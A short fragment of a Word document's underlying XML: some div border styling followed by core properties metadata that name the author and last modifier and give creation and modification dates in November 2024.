        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21016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profile?i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Dr.Fahad Samad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dr.Fahad Samad</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-20T05:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-20T05:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>